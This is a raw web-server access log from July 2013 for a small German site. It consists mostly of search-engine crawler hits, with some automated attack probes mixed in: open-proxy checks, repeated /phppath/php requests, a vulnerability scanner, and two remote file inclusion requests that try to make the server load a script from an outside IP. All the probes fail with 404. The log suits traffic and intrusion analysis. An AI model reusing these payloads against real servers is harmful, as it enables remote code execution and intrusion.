178.137.163.196 - - [01/Jul/2013:02:07:37 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.137.163.196 - - [01/Jul/2013:02:07:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.46.109.71 - - [01/Jul/2013:02:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
157.55.32.229 - - [01/Jul/2013:03:08:45 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.229 - - [01/Jul/2013:03:09:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.229 - - [01/Jul/2013:03:39:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.78.171 - - [01/Jul/2013:03:47:23 +0200] "GET /robots.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.171 - - [01/Jul/2013:03:47:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.66 - - [01/Jul/2013:04:21:04 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.66 - - [01/Jul/2013:04:21:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.226.212.41 - - [01/Jul/2013:04:49:38 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
66.249.78.103 - - [01/Jul/2013:04:49:41 +0200] "GET /robots.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.103 - - [01/Jul/2013:04:49:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.226.212.41 - - [01/Jul/2013:04:51:26 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [01/Jul/2013:05:20:50 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
141.8.147.12 - - [01/Jul/2013:05:54:12 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
91.226.212.41 - - [01/Jul/2013:06:12:29 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [01/Jul/2013:06:18:04 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [01/Jul/2013:06:45:49 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [01/Jul/2013:07:21:11 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [01/Jul/2013:08:01:55 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
91.226.212.41 - - [01/Jul/2013:08:11:48 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
92.206.67.216 - - [01/Jul/2013:08:18:06 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
92.206.67.216 - - [01/Jul/2013:08:18:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.33.20.188 - - [01/Jul/2013:08:23:18 +0200] "POST /trackback/ HTTP/1.1" 404 320 "http://www.mink-berlin.de/trackback/" "-"
66.249.78.171 - - [01/Jul/2013:08:25:22 +0200] "GET /robots.txt HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.226.212.41 - - [01/Jul/2013:08:36:01 +0200] "GET http://www.proxy-alert.com/remote.php HTTP/1.1" 404 321 "-" "-"
141.8.147.12 - - [01/Jul/2013:09:11:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.9.7.208 - - [01/Jul/2013:12:02:26 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [01/Jul/2013:12:02:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
66.249.78.111 - - [01/Jul/2013:12:18:03 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.111 - - [01/Jul/2013:12:18:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.154 - - [01/Jul/2013:12:21:29 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.154 - - [01/Jul/2013:12:21:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.193 - - [01/Jul/2013:12:28:21 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.193 - - [01/Jul/2013:12:28:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.40 - - [01/Jul/2013:12:35:12 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.40 - - [01/Jul/2013:12:35:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.98 - - [01/Jul/2013:12:48:55 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.98 - - [01/Jul/2013:12:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.75 - - [01/Jul/2013:12:52:21 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.36 - - [01/Jul/2013:12:52:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.242.125.191 - - [01/Jul/2013:13:08:09 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.125.191 - - [01/Jul/2013:13:08:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
66.249.78.103 - - [01/Jul/2013:13:16:21 +0200] "GET /robots.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.103 - - [01/Jul/2013:13:16:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.32.229 - - [01/Jul/2013:14:49:44 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.229 - - [01/Jul/2013:14:50:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
74.116.88.126 - - [01/Jul/2013:16:35:24 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
157.55.35.94 - - [01/Jul/2013:16:51:42 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.94 - - [01/Jul/2013:17:03:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
198.20.69.74 - - [01/Jul/2013:17:58:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.69.74 - - [01/Jul/2013:17:58:24 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
157.55.32.229 - - [01/Jul/2013:18:33:44 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.229 - - [01/Jul/2013:18:34:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
74.52.245.146 - - [01/Jul/2013:18:46:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
66.249.78.111 - - [01/Jul/2013:18:48:58 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.111 - - [01/Jul/2013:18:48:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.154 - - [01/Jul/2013:19:02:41 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.154 - - [01/Jul/2013:19:02:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.36 - - [01/Jul/2013:19:16:24 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.52.245.146 - - [01/Jul/2013:20:08:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
74.52.245.146 - - [01/Jul/2013:20:08:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
74.52.245.146 - - [01/Jul/2013:20:08:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
74.52.245.146 - - [01/Jul/2013:20:08:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
5.9.7.208 - - [01/Jul/2013:20:25:54 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.7.208 - - [01/Jul/2013:20:29:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
141.8.147.12 - - [01/Jul/2013:20:38:37 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
198.74.231.14 - - [01/Jul/2013:21:21:06 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
198.74.231.14 - - [01/Jul/2013:21:21:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
74.52.245.146 - - [01/Jul/2013:22:56:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0"
118.88.20.119 - - [02/Jul/2013:01:18:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.75 Safari/537.1"
141.8.147.12 - - [02/Jul/2013:02:00:25 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.147.12 - - [02/Jul/2013:02:07:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.193.171.227 - - [02/Jul/2013:02:17:28 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:28 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:28 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:28 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:28 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:28 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:29 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:30 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:30 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
66.193.171.227 - - [02/Jul/2013:02:17:30 +0200] "GET /user/soapCaller.bs HTTP/1.1" 404 323 "-" "Morfeus Fucking Scanner"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
91.121.108.31 - - [02/Jul/2013:03:31:45 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
141.8.147.12 - - [02/Jul/2013:03:57:20 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.32.229 - - [02/Jul/2013:04:13:11 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.229 - - [02/Jul/2013:04:15:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [02/Jul/2013:06:17:01 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [02/Jul/2013:06:27:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.12 - - [02/Jul/2013:07:01:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
136.186.231.16 - - [02/Jul/2013:07:59:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.8.147.12 - - [02/Jul/2013:08:34:02 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
94.23.45.14 - - [02/Jul/2013:09:24:50 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
141.8.147.12 - - [02/Jul/2013:12:39:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.246.165.210 - - [02/Jul/2013:13:50:37 +0200] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.210 - - [02/Jul/2013:13:50:38 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferantberlin-69b.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
218.85.157.55 - - [02/Jul/2013:14:19:55 +0200] "GET /appserv/main.php?appserv_root=http://211.151.185.53/.cgi/go.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
218.85.157.55 - - [02/Jul/2013:14:19:55 +0200] "GET /appserv/main.php?appserv_root=http://211.151.185.53/.cgi/go.txt? HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
157.55.32.229 - - [02/Jul/2013:15:24:06 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.246.161.190 - - [02/Jul/2013:15:30:11 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.190 - - [02/Jul/2013:15:30:12 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlberlin-ufb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
157.55.32.229 - - [02/Jul/2013:15:35:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
64.246.165.140 - - [02/Jul/2013:15:37:12 +0200] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [02/Jul/2013:15:37:12 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--premiuml-t4a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
141.8.147.12 - - [02/Jul/2013:15:39:30 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
216.145.14.142 - - [02/Jul/2013:16:00:19 +0200] "GET /robots.txt HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.14.142 - - [02/Jul/2013:16:00:19 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferungen-pwb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
198.20.69.74 - - [02/Jul/2013:16:15:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.20.69.74 - - [02/Jul/2013:16:15:15 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
65.55.24.217 - - [02/Jul/2013:16:17:40 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [02/Jul/2013:16:26:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
141.8.147.12 - - [02/Jul/2013:16:52:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.246.178.34 - - [02/Jul/2013:17:09:05 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.178.34 - - [02/Jul/2013:17:09:06 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlpreiseberlin-2zb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
188.165.195.156 - - [02/Jul/2013:18:29:54 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
216.145.14.142 - - [02/Jul/2013:18:43:18 +0200] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.14.142 - - [02/Jul/2013:18:43:18 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--essohndler-u5a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
213.246.61.54 - - [02/Jul/2013:20:21:05 +0200] "GET /phppath/php HTTP/1.0" 404 312 "-" "-"
141.8.147.12 - - [02/Jul/2013:21:44:46 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.33.113 - - [03/Jul/2013:00:13:40 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.92.173 - - [03/Jul/2013:01:13:55 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.56.92.173 - - [03/Jul/2013:01:14:52 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.77.126.55 - - [03/Jul/2013:01:43:46 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [03/Jul/2013:01:43:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
157.55.33.113 - - [03/Jul/2013:01:58:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.115 - - [03/Jul/2013:03:23:05 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.52.115 - - [03/Jul/2013:03:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:04:47:45 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:05:10:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:10:27:23 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.55.24.217 - - [03/Jul/2013:10:31:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
217.230.138.197 - - [03/Jul/2013:11:52:02 +0200] "GET / HTTP/1.1" 200 1229 "http://www.bigfinder.de/online-11.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; ATC/1.0; .NET CLR 1.1.4322; ATC/1.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
194.153.113.35 - - [03/Jul/2013:14:57:49 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
65.55.24.217 - - [03/Jul/2013:15:34:19 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
